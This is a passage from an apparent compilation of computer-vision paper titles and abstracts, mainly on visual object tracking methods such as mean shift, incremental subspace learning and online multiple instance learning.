evaluation set, as well as on imagery obtained in the context of a real-life object recognition application. Both show SURF's strong performance. --- paper_title: Incremental focus of attention for robust visual tracking paper_content: We present the Incremental Focus of Attention (IFA) architecture for adding robustness to software-based, real-time, motion trackers. The framework provides a structure which, when given the entire camera image to search, efficiently focuses the attention of the system into a narrow set of possible slates that includes the target state. IFA offers a means for automatic tracking initialization and reinitialization when environmental conditions momentarily deteriorate and cause the system to lose track of its target. Systems based on the framework degrade gracefully as various assumptions about the environment are violated. In particular, multiple tracking algorithms are layered so that the failure of a single algorithm causes another algorithm of less precision to take over, thereby allowing the system to return approximate feature state information. --- paper_title: Histograms of oriented gradients for human detection paper_content: We study the question of feature sets for robust visual object recognition; adopting linear SVM based human detection as a test case. After reviewing existing edge and gradient based descriptors, we show experimentally that grids of histograms of oriented gradient (HOG) descriptors significantly outperform existing feature sets for human detection. We study the influence of each stage of the computation on performance, concluding that fine-scale gradients, fine orientation binning, relatively coarse spatial binning, and high-quality local contrast normalization in overlapping descriptor blocks are all important for good results. The new approach gives near-perfect separation on the original MIT pedestrian database, so we introduce a more challenging dataset containing over 1800 annotated human images with a large range of pose variations and backgrounds. --- paper_title: SURF Tracking paper_content: Most motion-based tracking algorithms assume that objects undergo rigid motion, which is most likely disobeyed in real world. In this paper, we present a novel motion-based tracking framework which makes no such assumptions. Object is represented by a set of local invariant features, whose motions are observed by a feature correspondence process. A generative model is proposed to depict the relationship between local feature motions and object global motion, whose parameters are learned efficiently by an on-line EM algorithm. And the object global motion is estimated in term of maximum likelihood of observations. Then an updating mechanism is employed to adapt object representation. Experiments show that our framework is flexible and robust in dealing with appearance changes, background clutter, illumination changes and occlusion. --- paper_title: Human tracking by multiple kernel boosting with locality affinity constraints paper_content: In this paper, we incorporate the concept of Multiple Kernel Learning (MKL) algorithm, which is used in object categorization, into human tracking field. For efficiency, we devise an algorithm called Multiple Kernel Boosting (MKB), instead of directly adopting MKL. MKB aims to find an optimal combination of many single kernel SVMs focusing on different features and kernels by boosting technique. Besides, we apply Locality Affinity Constraints (LAC) to each selected SVM. LAC is computed from the distribution of support vectors of respective SVM, recording the underlying locality of training data. An update scheme to reselect good SVMs, adjust their weights and recalculate LAC is also included. Experiments on standard and our own testing sequences show that our MKB tracking outperforms some other state-of-the-art algorithms in handling various conditions. --- paper_title: Probabilistic Object Tracking With Dynamic Attributed Relational Feature Graph paper_content: Object tracking is one of the fundamental problems in computer vision and has received considerable attention in the past two decades. The success of a tracking algorithm relies on two key issues: 1) an effective representation so that the object being tracked can be distinguished from the background and other objects and 2) an update scheme of the object representation to accommodate object appearance and structure changes. Despite the progress made in the past, reliable and efficient tracking of objects with changing appearance remains a challenging problem. In this paper, a novel sparse, local feature-based object representation, the attributed relational feature graph, is proposed to solve this problem. The object is modeled using invariant features such as the scale-invariant feature transform and the geometric relations among features are encoded in the form of a graph. A dynamic model is developed to evolve the feature graph according to the appearance and structure changes by adding new stable features as well as removing inactive features. Extensive experiments show that our method can achieve reliable tracking even under significant appearance changes, view point changes, and occlusion. --- paper_title: Efficient Maximally Stable Extremal Region (MSER) Tracking paper_content: This paper introduces a tracking method for the well known local MSER (Maximally Stable Extremal Region) detector. The component tree is used as an efficient data structure, which allows the calculation of MSERs in quasi-linear time. It is demonstrated that the tree is able to manage the required data for tracking. We show that by means of MSER tracking the computational time for the detection of single MSERs can be improved by a factor of 4 to 10. Using a weighted feature vector for data association improves the tracking stability. Furthermore, the component tree enables backward tracking which further improves the robustness. The novel MSER tracking algorithm is evaluated on a variety of scenes. In addition, we demonstrate three different applications, tracking of license plates, faces and fibers in paper, showing in all three scenarios improved speed and stability. --- paper_title: Object Level Grouping for Video Shots paper_content: We describe a method for automatically obtaining object representations suitable for retrieval from generic video shots. The object representation consists of an association of frame regions. These regions provide exemplars of the object’s possible visual appearances.Two ideas are developed: (i) associating regions within a single shot to represent a deforming object; (ii) associating regions from the multiple visual aspects of a 3D object, thereby implicitly representing 3D structure. For the association we exploit temporal continuity (tracking) and wide baseline matching of affine covariant regions.In the implementation there are three areas of novelty: First, we describe a method to repair short gaps in tracks. Second, we show how to join tracks across occlusions (where many tracks terminate simultaneously). Third, we develop an affine factorization method that copes with motion degeneracy.We obtain tracks that last throughout the shot, without requiring a 3D reconstruction. The factorization method is used to associate tracks into object-level groups, with common motion. The outcome is that separate parts of an object that are not simultaneously visible (such as the front and back of a car, or the front and side of a face) are associated together. In turn this enables object-level matching and recognition throughout a video.We illustrate the method on the feature film “Groundhog Day.” Examples are given for the retrieval of deforming objects (heads, walking people) and rigid objects (vehicles, locations). --- paper_title: Tracking aspects of the foreground against the background paper_content: In object tracking, change of object aspect is a cause of failure due to significant changes of object appearances. The paper proposes an approach to this problem without a priori learning object views. The object identification relies on a discriminative model using both object and background appearances. The background is represented as a set of texture patterns. The tracking algorithm then maintains a set of discriminant functions each recognizing a pattern in the object region against the background patterns that are currently relevant. Object matching is then performed efficiently by maximization of the sum of the discriminant functions over all object patterns. As a result, the tracker searches for the region that matches the target object and it also avoids background patterns seen before. The results of the experiment show that the proposed tracker is robust to even severe aspect changes when unseen views of the object come into view. --- paper_title: Guided Search 2.0 A revised model of visual search paper_content: An important component of routine visual behavior is the ability to find one item in a visual world filled with other, distracting items. This ability to performvisual search has been the subject of a large body of research in the past 15 years. This paper reviews the visual search literature and presents a model of human search behavior. Built upon the work of Neisser, Treisman, Julesz, and others, the model distinguishes between a preattentive, massively parallel stage that processes information about basic visual features (color, motion, various depth cues, etc.) across large portions of the visual field and a subsequent limited-capacity stage that performs other, more complex operations (e.g., face recognition, reading, object identification) over a limited portion of the visual field. The spatial deployment of the limited-capacity process is under attentional control. The heart of the guided search model is the idea that attentional deployment of limited resources isguided by the output of the earlier parallel processes. Guided Search 2.0 (GS2) is a revision of the model in which virtually all aspects of the model have been made more explicit and/or revised in light of new data. The paper is organized into four parts: Part 1 presents the model and the details of its computer simulation. Part 2 reviews the visual search literature on preattentive processing of basic features and shows how the GS2 simulation reproduces those results. Part 3 reviews the literature on the attentional deployment of limited-capacity processes in conjunction and serial searches and shows how the simulation handles those conditions. Finally, Part 4 deals with shortcomings of the model and unresolved issues. --- paper_title: Saliency-based discriminant tracking paper_content: We propose a biologically inspired framework for visual tracking based on discriminant center surround saliency. At each frame, discrimination of the target from the background is posed as a binary classification problem. From a pool of feature descriptors for the target and background, a subset that is most informative for classification between the two is selected using the principle of maximum marginal diversity. Using these features, the location of the target in the next frame is identified using top-down saliency, completing one iteration of the tracking algorithm. We also show that a simple extension of the framework to include motion features in a bottom-up saliency mode can robustly identify salient moving objects and automatically initialize the tracker. The connections of the proposed method to existing works on discriminant tracking are discussed. Experimental results comparing the proposed method to the state of the art in tracking are presented, showing improved performance. --- paper_title: Robust real-time object detection paper_content: This paper describes a visual object detection framework that is capable of processing images extremely rapidly while achieving high detection rates. There are three key contributions. The first is the introduction of a new image representation called the “Integral Image” which allows the features used by our detector to be computed very quickly. The second is a learning algorithm, based on AdaBoost, which selects a small number of critical visual features and yields extremely efficient classifiers [4]. The third contribution is a method for combining classifiers in a “cascade” which allows background regions of the image to be quickly discarded while spending more computation on promising object-like regions. A set of experiments in the domain of face detection are presented. The system yields face detection performance comparable to the best previous systems [16, 11, 14, 10, 1]. Implemented on a conventional desktop, face detection proceeds at 15 frames per second. Author email: fPaul.Viola,[email protected] c Compaq Computer Corporation, 2001 This work may not be copied or reproduced in whole or in part for any commercial purpose. Permission to copy in whole or in part without payment of fee is granted for nonprofit educational and research purposes provided that all such whole or partial copies include the following: a notice that such copying is by permission of the Cambridge Research Laboratory of Compaq Computer Corporation in Cambridge, Massachusetts; an acknowledgment of the authors and individual contributors to the work; and all applicable portions of the copyright notice. Copying, reproducing, or republishing for any other purpose shall require a license with payment of fee to the Cambridge Research Laboratory. All rights reserved. CRL Technical reports are available on the CRL’s web page at http://crl.research.compaq.com. Compaq Computer Corporation Cambridge Research Laboratory One Cambridge Center Cambridge, Massachusetts 02142 USA --- paper_title: Online selection of discriminative tracking features paper_content: This paper presents an online feature selection mechanism for evaluating multiple features while tracking and adjusting the set of features used to improve tracking performance. Our hypothesis is that the features that best discriminate between object and background are also best for tracking the object. Given a set of seed features, we compute log likelihood ratios of class conditional sample densities from object and background to form a new set of candidate features tailored to the local object/background discrimination task. The two-class variance ratio is used to rank these new features according to how well they separate sample distributions of object and background pixels. This feature evaluation mechanism is embedded in a mean-shift tracking system that adaptively selects the top-ranked discriminative features for tracking. Examples are presented that demonstrate how this method adapts to changing appearances of both tracked object and scene background. We note susceptibility of the variance ratio feature selection method to distraction by spatially correlated background clutter and develop an additional approach that seeks to minimize the likelihood of distraction. --- paper_title: Spatial selection for attentional visual tracking paper_content: Long-duration tracking of general targets is quite challenging for computer vision, because in practice target may undergo large uncertainties in its visual appearance and the unconstrained environments may be cluttered and distractive, although tracking has never been a challenge to the human visual system. Psychological and cognitive findings indicate that the human perception is attentional and selective, and both early attentional selection that may be innate and late attentional selection that may be learned are necessary for human visual tracking. This paper proposes a new visual tracking approach by reflecting some aspects of spatial selective attention, and presents a novel attentional visual tracking (AVT) algorithm. In AVT, the early selection process extracts a pool of attentional regions (ARs) that are defined as the salient image regions which have good localization properties, and the late selection process dynamically identifies a subset of discriminative attentional regions (D-ARs) through a discriminative learning on the historical data on the fly. The computationally demanding process of matching of the AR pool is done in an efficient and innovative way by using the idea in the locality-sensitive hashing (LSH) technique. The proposed AVT algorithm is general, robust and computationally efficient, as shown in extensive experiments on a large variety of real-world video. --- paper_title: Superpixel tracking paper_content: While numerous algorithms have been proposed for object tracking with demonstrated success, it remains a challenging problem for a tracker to handle large change in scale, motion, shape deformation with occlusion. One of the main reasons is the lack of effective image representation to account for appearance variation. Most trackers use high-level appearance structure or low-level cues for representing and matching target objects. In this paper, we propose a tracking method from the perspective of mid-level vision with structural information captured in superpixels. We present a discriminative appearance model based on superpixels, thereby facilitating a tracker to distinguish the target and the background with mid-level cues. The tracking task is then formulated by computing a target-background confidence map, and obtaining the best candidate by maximum a posterior estimate. Experimental results demonstrate that our tracker is able to handle heavy occlusion and recover from drifts. In conjunction with online update, the proposed algorithm is shown to perform favorably against existing methods for object tracking. --- paper_title: Hierarchical Part-Template Matching for Human Detection and Segmentation paper_content: Local part-based human detectors are capable of handling partial occlusions efficiently and modeling shape articulations flexibly, while global shape template-based human detectors are capable of detecting and segmenting human shapes simultaneously. We describe a Bayesian approach to human detection and segmentation combining local part-based and global template-based schemes. The approach relies on the key ideas of matching a part-template tree to images hierarchically to generate a reliable set of detection hypotheses and optimizing it under a Bayesian MAP framework through global likelihood re-evaluation and fine occlusion analysis. In addition to detection, our approach is able to obtain human shapes and poses simultaneously. We applied the approach to human detection and segmentation in crowded scenes with and without background subtraction. Experimental results show that our approach achieves good performance on images and video sequences with severe occlusion. --- paper_title: Online tracking and reacquisition using co-trained generative and discriminative trackers paper_content: Visual tracking is a challenging problem, as an object may change its appearance due to viewpoint variations, illumination changes, and occlusion. Also, an object may leave the field of view and then reappear. In order to track and reacquire an unknown object with limited labeling data, we propose to learn these changes online and build a model that describes all seen appearance while tracking. To address this semi-supervised learning problem, we propose a co-training based approach to continuously label incoming data and online update a hybrid discriminative generative model. The generative model uses a number of low dimension linear subspaces to describe the appearance of the object. In order to reacquire an object, the generative model encodes all the appearance variations that have been seen. A discriminative classifier is implemented as an online support vector machine, which is trained to focus on recent appearance variations. The online co-training of this hybrid approach accounts for appearance changes and allows reacquisition of an object after total occlusion. We demonstrate that under challenging situations, this method has strong reacquisition ability and robustness to distracters in background. --- paper_title: Real time object tracking based on dynamic feature grouping with background subtraction paper_content: Object detection and tracking has various application areas including intelligent transportation systems. We introduce an object detection and tracking approach that combines the background subtraction algorithm and the feature tracking and grouping algorithm. We first present an augmented background subtraction algorithm which uses a low-level feature tracking as a cue. The resulting background subtraction cues are used to improve the feature detection and grouping result. We then present a dynamic multi-level feature grouping approach that can be used in real time applications and also provides high-quality trajectories. Experimental results from video clips of a challenging transportation application are presented. --- paper_title: Visual tracking with online Multiple Instance Learning paper_content: In this paper, we address the problem of learning an adaptive appearance model for object tracking. In particular, a class of tracking techniques called “tracking by detection” have been shown to give promising results at real-time speeds. These methods train a discriminative classifier in an online manner to separate the object from the background. This classifier bootstraps itself by using the current tracker state to extract positive and negative examples from the current frame. Slight inaccuracies in the tracker can therefore lead to incorrectly labeled training examples, which degrades the classifier and can cause further drift. In this paper we show that using Multiple Instance Learning (MIL) instead of traditional supervised learning avoids these problems, and can therefore lead to a more robust tracker with fewer parameter tweaks. We present a novel online MIL algorithm for object tracking that achieves superior results with real-time performance. --- paper_title: Tracking colour objects using adaptive mixture models paper_content: The use of adaptive Gaussian mixtures to model the colour distributions of objects is described. These models are used to perform robust, real-time tracking under varying illumination, viewing geometry and camera parameters. Observed log-likelihood measurements were used to perform selective adaptation. --- paper_title: Robust online appearance models for visual tracking paper_content: We propose a framework for learning robust, adaptive appearance models to be used for motion-based tracking of natural objects. The approach involves a mixture of stable image structure, learned over long time courses, along with 2-frame motion information and an outlier process. An online EM-algorithm is used to adapt the appearance model parameters over time. An implementation of this approach is developed for an appearance model based on the filter responses from a steerable pyramid. This model is used in a motion-based tracking algorithm to provide robustness in the face of image outliers, such as those caused by occlusions. It also provides the ability to adapt to natural changes in appearance, such as those due to facial expressions or variations in 3D pose. We show experimental results on a variety of natural image sequences of people moving within cluttered environments. --- paper_title: Differential Tracking based on Spatial-Appearance Model (SAM) paper_content: A fundamental issue in differential motion analysis is the compromise between the flexibility of the matching criterion for image regions and the ability of recovering the motion. Localized matching criteria, e.g., pixel-based SSD, may enable the recovery of all motion parameters, but it does not tolerate much appearance changes. On the other hand, global criteria, e.g., matching histograms, can accommodate dramatic appearance changes, but may be blind to some motion parameters, e.g., scaling and rotation. This paper presents a novel differential approach that integrates the advantages of both in a principled way based on a spatial-appearance model (SAM) that combines local appearances variations and global spatial structures. This model can capture a large variety of appearance variations that are attributed to the local non-rigidity. At the same time, this model enables efficient recovery of all motion parameters. A maximum likelihood matching criterion is defined and rigorous analytical results are obtained that lead to a closed form solution to motion tracking. Very encouraging results demonstrate the effectiveness and efficiency of the proposed method for tracking non-rigid objects that exhibit dramatic appearance deformations, large object scale changes and partial occlusions. --- paper_title: Visual tracking and recognition using appearance-adaptive models in particle filters paper_content: We present an approach that incorporates appearance-adaptive models in a particle filter to realize robust visual tracking and recognition algorithms. Tracking needs modeling interframe motion and appearance changes, whereas recognition needs modeling appearance changes between frames and gallery images. In conventional tracking algorithms, the appearance model is either fixed or rapidly changing, and the motion model is simply a random walk with fixed noise variance. Also, the number of particles is typically fixed. All these factors make the visual tracker unstable. To stabilize the tracker, we propose the following modifications: an observation model arising from an adaptive appearance model, an adaptive velocity motion model with adaptive noise variance, and an adaptive number of particles. The adaptive-velocity model is derived using a first-order linear predictor based on the appearance difference between the incoming observation and the previous particle configuration. Occlusion analysis is implemented using robust statistics. Experimental results on tracking visual objects in long outdoor and indoor video sequences demonstrate the effectiveness and robustness of our tracking algorithm. We then perform simultaneous tracking and recognition by embedding them in a particle filter. For recognition purposes, we model the appearance changes between frames and gallery images by constructing the intra- and extrapersonal spaces. Accurate recognition is achieved when confronted by pose and view variations. --- paper_title: On-line density-based appearance modeling for object tracking paper_content: Object tracking is a challenging problem in real-time computer vision due to variations of lighting condition, pose, scale, and view-point over time. However, it is exceptionally difficult to model appearance with respect to all of those variations in advance; instead, on-line update algorithms are employed to adapt to these changes. We present a new on-line appearance modeling technique which is based on sequential density approximation. This technique provides accurate and compact representations using Gaussian mixtures, in which the number of Gaussians is automatically determined. This procedure is performed in linear time at each time step, which we prove by amortized analysis. Features for each pixel and rectangular region are modeled together by the proposed sequential density approximation algorithm, and the target model is updated in scale robustly. We show the performance of our method by simulations and tracking in natural videos --- paper_title: Kernel-based Tracking from a Probabilistic Viewpoint paper_content: In this paper, we present a probabilistic formulation of kernel-based tracking methods based upon maximum likelihood estimation. To this end, we view the coordinates for the pixels in both, the target model and its candidate as random variables and make use of a generative model so as to cast the tracking task into a maximum likelihood framework. This, in turn, permits the use of the EM-algorithm to estimate a set of latent variables that can be used to update the target-center position. Once the latent variables have been estimated, we use the Kullback-Leibler divergence so as to minimise the mutual information between the target model and candidate distributions in order to develop a target-center update rule and a kernel bandwidth adjustment scheme. The method is very general in nature. We illustrate the utility of our approach for purposes of tracking on real-world video sequences using two alternative kernel functions. --- paper_title: Kernel-Based Object Tracking paper_content: A new approach toward target representation and localization, the central component in visual tracking of nonrigid objects, is proposed. The feature histogram-based target representations are regularized by spatial masking with an isotropic kernel. The masking induces spatially-smooth similarity functions suitable for gradient-based optimization, hence, the target localization problem can be formulated using the basin of attraction of the local maxima. We employ a metric derived from the Bhattacharyya coefficient as similarity measure, and use the mean shift procedure to perform the optimization. In the presented tracking examples, the new method successfully coped with camera motion, partial occlusions, clutter, and target scale variations. Integration with motion filters and data association techniques is also discussed. We describe only a few of the potential applications: exploitation of background information, Kalman tracking using motion models, and face tracking. --- paper_title: Sequential Kernel Density Approximation and Its Application to Real-Time Visual Tracking paper_content: Visual features are commonly modeled with probability density functions in computer vision problems, but current methods such as a mixture of Gaussians and kernel density estimation suffer from either the lack of flexibility by fixing or limiting the number of Gaussian components in the mixture or large memory requirement by maintaining a nonparametric representation of the density. These problems are aggravated in real-time computer vision applications since density functions are required to be updated as new data becomes available. We present a novel kernel density approximation technique based on the mean-shift mode finding algorithm and describe an efficient method to sequentially propagate the density modes over time. Although the proposed density representation is memory efficient, which is typical for mixture densities, it inherits the flexibility of nonparametric methods by allowing the number of components to be variable. The accuracy and compactness of the sequential kernel density approximation technique is illustrated by both simulations and experiments. Sequential kernel density approximation is applied to online target appearance modeling for visual tracking, and its performance is demonstrated on a variety of videos. --- paper_title: Tracking by Affine Kernel Transformations Using Color and Boundary Cues paper_content: Kernel-based trackers aggregate image features within the support of a kernel (a mask) regardless of their spatial structure. These trackers spatially fit the kernel (usually in location and in scale) such that a function of the aggregate is optimized. We propose a kernel-based visual tracker that exploits the constancy of color and the presence of color edges along the target boundary. The tracker estimates the best affinity of a spatially aligned pair of kernels, one of which is color-related and the other of which is object boundary-related. In a sense, this work extends previous kernel-based trackers by incorporating the object boundary cue into the tracking process and by allowing the kernels to be affinely transformed instead of only translated and isotropically scaled. These two extensions make for more precise target localization. A more accurately localized target also facilitates safer updating of its reference color model, further enhancing the tracker's robustness. The improved tracking is demonstrated for several challenging image sequences. --- paper_title: Annealed importance sampling paper_content: Simulated annealing - moving from a tractable distribution to a distribution of interest via a sequence of intermediate distributions - has traditionally been used as an inexact method of handling isolated modes in Markov chain samplers. Here, it is shown how one can use the Markov chain transitions for such an annealing sequence to define an importance sampler. The Markov chain aspect allows this method to perform acceptably even for high-dimensional problems, where finding good importance sampling distributions would otherwise be very difficult, while the use of importance weights ensures that the estimates found converge to the correct values as the number of annealing runs increases. This annealed importance sampling procedure resembles the second half of the previously-studied tempered transitions, and can be seen as a generalization of a recently-proposed variant of sequential importance sampling. It is also related to thermodynamic integration methods for estimating ratios of normalizing constants. Annealed importance sampling is most attractive when isolated modes are present, or when estimates of normalizing constants are required, but it may also be more generally useful, since its independent sampling allows one to bypass some of the problems of assessing convergence and autocorrelation in Markov chain samplers. --- paper_title: Fast Global Kernel Density Mode Seeking: Applications to Localization and Tracking paper_content: Tracking objects in video using the mean shift (MS) technique has been the subject of considerable attention. In this work, we aim to remedy one of its shortcomings. MS, like other gradient ascent optimization methods, is designed to find local modes. In many situations, however, we seek the global mode of a density function. The standard MS tracker assumes that the initialization point falls within the basin of attraction of the desired mode. When tracking objects in video this assumption may not hold, particularly when the target's displacement between successive frames is large. In this case, the local and global modes do not correspond and the tracker is likely to fail. A novel multibandwidth MS procedure is proposed which converges to the global mode of the density function, regardless of the initialization point. We term the procedure annealed MS, as it shares similarities with the annealed importance sampling procedure. The bandwidth of the procedure plays the same role as the temperature in conventional annealing. We observe that an over-smoothed density function with a sufficiently large bandwidth is unimodal. Using a continuation principle, the influence of the global peak in the density function is introduced gradually. In this way, the global maximum is more reliably located. Since it is imperative that the computational complexity is minimal for real-time applications, such as visual tracking, we also propose an accelerated version of the algorithm. This significantly decreases the number of iterations required to achieve convergence. We show on various data sets that the proposed algorithm offers considerable promise in reliably and rapidly finding the true object location when initialized from a distant point. --- paper_title: Mean-shift blob tracking through scale space paper_content: The mean-shift algorithm is an efficient technique for tracking 2D blobs through an image. Although the scale of the mean-shift kernel is a crucial parameter, there is presently no clean mechanism for choosing or updating scale while tracking blobs that are changing in size. We adapt Lindeberg's (1998) theory of feature scale selection based on local maxima of differential scale-space filters to the problem of selecting kernel scale for mean-shift blob tracking. We show that a difference of Gaussian (DOG) mean-shift kernel enables efficient tracking of blobs through scale space. Using this kernel requires generalizing the mean-shift algorithm to handle images that contain negative sample weights. --- paper_title: Mean Shift tracking with multiple reference color histograms paper_content: The Mean Shift tracker is a widely used tool for robustly and quickly tracking the location of an object in an image sequence using the object's color histogram. The reference histogram is typically set to that in the target region in the frame where the tracking is initiated. Often, however, no single view suffices to produce a reference histogram appropriate for tracking the target. In contexts where multiple views of the target are available prior to the tracking, this paper enhances the Mean Shift tracker to use multiple reference histograms obtained from these different target views. This is done while preserving both the convergence and the speed properties of the original tracker. We first suggest a simple method to use multiple reference histograms for producing a single histogram that is more appropriate for tracking the target. Then, to enhance the tracking further, we propose an extension to the Mean Shift tracker where the convex hull of these histograms is used as the target model. Many experimental results demonstrate the successful tracking of targets whose visible colors change drastically and rapidly during the sequence, where the basic Mean Shift tracker obviously fails. --- paper_title: Object Tracking by Asymmetric Kernel Mean Shift with Automatic Scale and Orientation Selection paper_content: Tracking objects using the mean shift method is performed by iteratively translating a kernel in the image space such that the past and current object observations are similar. Traditional mean shift method requires a symmetric kernel, such as a circle or an ellipse, and assumes constancy of the object scale and orientation during the course of tracking. In a tracking scenario, it is not uncommon to observe objects with complex shapes whose scale and orientation constantly change due to the camera and object motions. In this paper, we present an object tracking method based on the asymmetric kernel mean shift, in which the scale and orientation of the kernel adaptively change depending on the observations at each iteration. Proposed method extends the traditional mean shift tracking, which is performed in the image coordinates, by including the scale and orientation as additional dimensions and simultaneously estimates all the unknowns in a few number of mean shift iterations. The experimental results show that the proposed method is superior to the traditional mean shift tracking in the following aspects: 1) it provides consistent object tracking throughout the video; 2) it is not effected by the scale and orientation changes of the tracked objects; 3) it is less prone to the background clutter. --- paper_title: Online multiple instance learning with no regret paper_content: Multiple instance (MI) learning is a recent learning paradigm that is more flexible than standard supervised learning algorithms in the handling of label ambiguity. It has been used in a wide range of applications including image classification, object detection and object tracking. Typically, MI algorithms are trained in a batch setting in which the whole training set has to be available before training starts. However, in applications such as tracking, the classifier needs to be trained continuously as new frames arrive. Motivated by the empirical success of a batch MI algorithm called MILES, we propose in this paper an online MI learning algorithm that has an efficient online update procedure and also performs joint feature selection and classification as MILES. Besides, while existing online MI algorithms lack theoretical properties, we prove that the proposed online algorithm has a (cumulative) regret of O(√T), where T is the number of iterations. In other words, the average regret goes to zero asymptotically and it thus achieves the same performance as the best solution in hindsight. Experiments on a number of MI classification and object tracking data sets demonstrate encouraging results. --- paper_title: Online spatio-temporal structural context learning for visual tracking paper_content: Visual tracking is a challenging problem, because the target frequently change its appearance, randomly move its location and get occluded by other objects in unconstrained environments. The state changes of the target are temporally and spatially continuous, in this paper therefore, a robust Spatio-Temporal structural context based Tracker (STT) is presented to complete the tracking task in unconstrained environments. The temporal context capture the historical appearance information of the target to prevent the tracker from drifting to the background in a long term tracking. The spatial context model integrates contributors, which are the key-points automatically discovered around the target, to build a supporting field. The supporting field provides much more information than appearance of the target itself so that the location of the target will be predicted more precisely. Extensive experiments on various challenging databases demonstrate the superiority of our proposed tracker over other state-of-the-art trackers. --- paper_title: Object Tracking via Partial Least Squares Analysis paper_content: We propose an object tracking algorithm that learns a set of appearance models for adaptive discriminative object representation. In this paper, object tracking is posed as a binary classification problem in which the correlation of object appearance and class labels from foreground and background is modeled by partial least squares (PLS) analysis, for generating a low-dimensional discriminative feature subspace. As object appearance is temporally correlated and likely to repeat over time, we learn and adapt multiple appearance models with PLS analysis for robust tracking. The proposed algorithm exploits both the ground truth appearance information of the target labeled in the first frame and the image observations obtained online, thereby alleviating the tracking drift problem caused by model update. Experiments on numerous challenging sequences and comparisons to state-of-the-art methods demonstrate favorable performance of the proposed tracking algorithm. --- paper_title: Robust Visual Tracking Based on Incremental Tensor Subspace Learning paper_content: Most existing subspace analysis-based tracking algorithms utilize a flattened vector to represent a target, resulting in a high dimensional data learning problem. Recently, subspace analysis is incorporated into the multilinear framework which offline constructs a representation of image ensembles using high-order tensors. This reduces spatio-temporal redundancies substantially, whereas the computational and memory cost is high. In this paper, we present an effective online tensor subspace learning algorithm which models the appearance changes of a target by incrementally learning a low-order tensor eigenspace representation through adaptively updating the sample mean and eigenbasis. Tracking then is led by the state inference within the framework in which a particle filter is used for propagating sample distributions over the time. A novel likelihood function, based on the tensor reconstruction error norm, is developed to measure the similarity between the test image and the learned tensor subspace model during the tracking. Theoretic analysis and experimental evaluations against a state-of-the-art method demonstrate the promise and effectiveness of this algorithm. --- paper_title: Incremental Singular Value Decomposition of Uncertain Data with Missing Values paper_content: We introduce an incremental singular value decomposition (SVD) of incomplete data. The SVD is developed as data arrives, and can handle arbitrary missing/untrusted values, correlated uncertainty across rows or columns of the measurement matrix, and user priors. Since incomplete data does not uniquely specify an SVD, the procedure selects one having minimal rank. For a dense p × q matrix of low rank r, the incremental method has time complexity O(pqr) and space complexity O((p + q)r)--better than highly optimized batch algorithms such as MATLAB's svd(). In cases of missing data, it produces factorings of lower rank and residual than batch SVD algorithms applied to standard missing-data imputations. We show applications in computer vision and audio feature extraction. In computer vision, we use the incremental SVD to develop an efficient and unusually robust subspace-estimating flow-based tracker, and to handle occlusions/missing points in structure-from-motion factorizations. --- paper_title: Dynamic Appearance Modeling for Human Tracking paper_content: Dynamic appearance is one of the most important cues for tracking and identifying moving people. However, direct modeling spatio-temporal variations of such appearance is often a difficult problem due to their high dimensionality and nonlinearities. In this paper we present a human tracking system that uses a dynamic appearance and motion modeling framework based on the use of robust system dynamics identification and nonlinear dimensionality reduction techniques. The proposed system learns dynamic appearance and motion models from a small set of initial frames and does not require prior knowledge such as gender or type of activity. The advantages of the proposed tracking system are illustrated with several examples where the learned dynamics accurately predict the location and appearance of the targets in future frames, preventing tracking failures due to model drifting, target occlusion and scene clutter. --- paper_title: Incremental learning of weighted tensor subspace for visual tracking paper_content: Tensor analysis has been widely utilized in image-related machine learning applications, which has preferable performance over the vector-based approaches for its capability of holding the spatial structure information in some research field. The traditional tensor representation only includes the intensity values, which is sensitive to illumination variation. For this purpose, a weighted tensor subspace (WTS) is defined as object descriptor by combining the Retinex image with the original image. Then, an incremental learning algorithm is developed for WTS to adapt to the appearance change during the tracking. The proposed method could learn the lightness changing incrementally and get robust tracking performance under various luminance conditions. The experimental results illustrate the effectiveness of the proposed visual tracking Scheme. --- paper_title: Weighted and robust incremental method for subspace learning paper_content: Visual learning is expected to be a continuous and robust process, which treats input images and pixels selectively. In this paper, we present a method for subspace learning, which takes these considerations into account. We present an incremental method, which sequentially updates the principal subspace considering weighted influence of individual images as well as individual pixels within an image. This approach is further extended to enable determination of consistencies in the input data and imputation of the values in inconsistent pixels using the previously acquired knowledge, resulting in a novel incremental, weighted and robust method for subspace learning. --- paper_title: Visual tracking using learned linear subspaces paper_content: This paper presents a simple but robust visual tracking algorithm based on representing the appearances of objects using affine warps of learned linear subspaces of the image space. The tracker adaptively updates this subspace while tracking by finding a linear subspace that best approximates the observations made in the previous frames. Instead of the traditional L/sup 2/-reconstruction error norm which leads to subspace estimation using PCA or SVD, we argue that a variant of it, the uniform L/sup 2/-reconstruction error norm, is the right one for tracking. Under this framework we provide a simple and a computationally inexpensive algorithm for finding a subspace whose uniform L/sup 2/-reconstruction error norm for a given collection of data samples is below some threshold, and a simple tracking algorithm is an immediate consequence. We show experimental results on a variety of image sequences of people and man-made objects moving under challenging imaging conditions, which include drastic illumination variation, partial occlusion and extreme pose variation. --- paper_title: Sequential Karhunen-Loeve basis extraction and its application to images paper_content: The Karhunen-Loeve (KL) transform is an optimal method for approximating a set of vectors, which was used in image processing and computer vision for several tasks. Its computational demands and its batch calculation nature have limited its application. Here we present a new, sequential algorithm for calculating the KL basis, which is faster in typical applications and is especially advantageous for image sequences: the KL basis calculation is done with much lower delay and allows for dynamic updating of object databases for recognition. Systematic tests of the implemented algorithm show that these advantages are indeed obtained with the same accuracy available from batch KL algorithms. --- paper_title: Incremental Kernel Principal Component Analysis paper_content: The kernel principal component analysis (KPCA) has been applied in numerous image-related machine learning applications and it has exhibited superior performance over previous approaches, such as PCA. However, the standard implementation of KPCA scales badly with the problem size, making computations for large problems infeasible. Also, the "batch" nature of the standard KPCA computation method does not allow for applications that require online processing. This has somewhat restricted the domains in which KPCA can potentially be applied. This paper introduces an incremental computation algorithm for KPCA to address these two problems. The basis of the proposed solution lies in computing incremental linear PCA in the kernel induced feature space, and constructing reduced-set expansions to maintain constant update speed and memory usage. We also provide experimental results which demonstrate the effectiveness of the approach --- paper_title: Incremental Learning for Robust Visual Tracking paper_content: Visual tracking, in essence, deals with non-stationary image streams that change over time. While most existing algorithms are able to track objects well in controlled environments, they usually fail in the presence of significant variation of the object's appearance or surrounding illumination. One reason for such failures is that many algorithms employ fixed appearance models of the target. Such models are trained using only appearance data available before tracking begins, which in practice limits the range of appearances that are modeled, and ignores the large volume of information (such as shape changes or specific lighting conditions) that becomes available during tracking. In this paper, we present a tracking method that incrementally learns a low-dimensional subspace representation, efficiently adapting online to changes in the appearance of the target. The model update, based on incremental algorithms for principal component analysis, includes two important features: a method for correctly updating the sample mean, and a 